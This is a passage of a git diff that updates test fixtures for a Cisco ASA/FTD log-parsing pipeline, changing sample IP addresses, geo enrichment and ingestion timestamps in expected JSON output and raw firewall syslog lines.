outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:32:11.535198400Z", + "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3564,8 +3564,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3596,14 +3596,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673329741Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:32:11.535204300Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3619,7 +3619,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3640,8 +3640,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3672,14 +3672,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673331489Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:32:11.535208900Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3695,7 +3695,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3716,8 +3716,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3748,7 +3748,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3756,8 +3756,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673333295Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:32:11.535213500Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-07-19T09:06:19.673335095Z", + "ingested": "2021-12-09T13:32:11.535217400Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3857,8 +3857,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3888,7 +3888,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -3896,8 +3896,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673336875Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535222200Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3921,8 +3921,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -3952,7 +3952,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -3960,8 +3960,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673338607Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535226500Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3985,8 +3985,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4016,7 +4016,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4024,8 +4024,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673340382Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535231100Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4049,8 +4049,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4080,7 +4080,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4088,8 +4088,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673342142Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535236Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4113,8 +4113,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4144,7 +4144,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4152,8 +4152,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673343970Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535258400Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4177,8 +4177,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4208,7 +4208,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4216,8 +4216,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673345870Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535263300Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673347696Z", + "ingested": "2021-12-09T13:32:11.535269400Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673349429Z", + "ingested": "2021-12-09T13:32:11.535273900Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4375,8 +4375,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4410,7 +4410,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4419,8 +4419,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673351166Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:32:11.535278800Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:19.673353847Z", + "ingested": "2021-12-09T13:32:11.535300500Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673448562Z", + "ingested": "2021-12-09T13:32:11.535306100Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4576,15 +4576,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, @@ -4622,14 +4622,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673454555Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:32:11.535311500Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4646,8 +4646,8 @@ "asa": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4660,8 +4660,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4701,13 +4701,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673457311Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:32:11.535315800Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4724,7 +4724,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4739,8 +4739,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4780,13 +4780,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673459727Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:32:11.535320300Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4804,7 +4804,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4818,8 +4818,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4844,13 +4844,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673489272Z", - "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:32:11.535325700Z", + "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4872,8 +4872,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4900,13 +4900,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673495577Z", - "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:32:11.535330500Z", + "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4928,8 +4928,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -4962,13 +4962,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673498923Z", - "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:32:11.535334400Z", + "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", @@ -4994,26 +4994,32 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 } }, - "address": "1.2.3.4", + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 80, "user": { "name": "username" }, - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "source": { "nat": { - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "address": "10.2.3.4", "port": 49926, @@ -5052,13 +5058,13 @@ ], "ip": [ "10.2.3.4", - "1.2.3.4" + "81.2.69.144" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673501322Z", - "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)", + "ingested": "2021-12-09T13:32:11.535339100Z", + "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5073,8 +5079,8 @@ "asa": { "destination_interface": "vlan-42", "mapped_source_port": 49926, - "mapped_destination_ip": "1.2.3.4", - "mapped_source_ip": "1.2.3.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "27215708", "source_interface": "internet", "mapped_destination_port": 80, diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json index e73b9c05db6..d8a0285afc9 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:24.775064690Z", + "ingested": "2021-12-09T13:32:19.965226800Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:24.775070482Z", + "ingested": "2021-12-09T13:32:19.965230800Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:24.775072629Z", + "ingested": "2021-12-09T13:32:19.965235200Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:24.775074513Z", + "ingested": "2021-12-09T13:32:19.965239100Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:24.775076252Z", + "ingested": "2021-12-09T13:32:19.965242900Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log index 9f0a0b8b598..5d21ffa5a9f 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log @@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 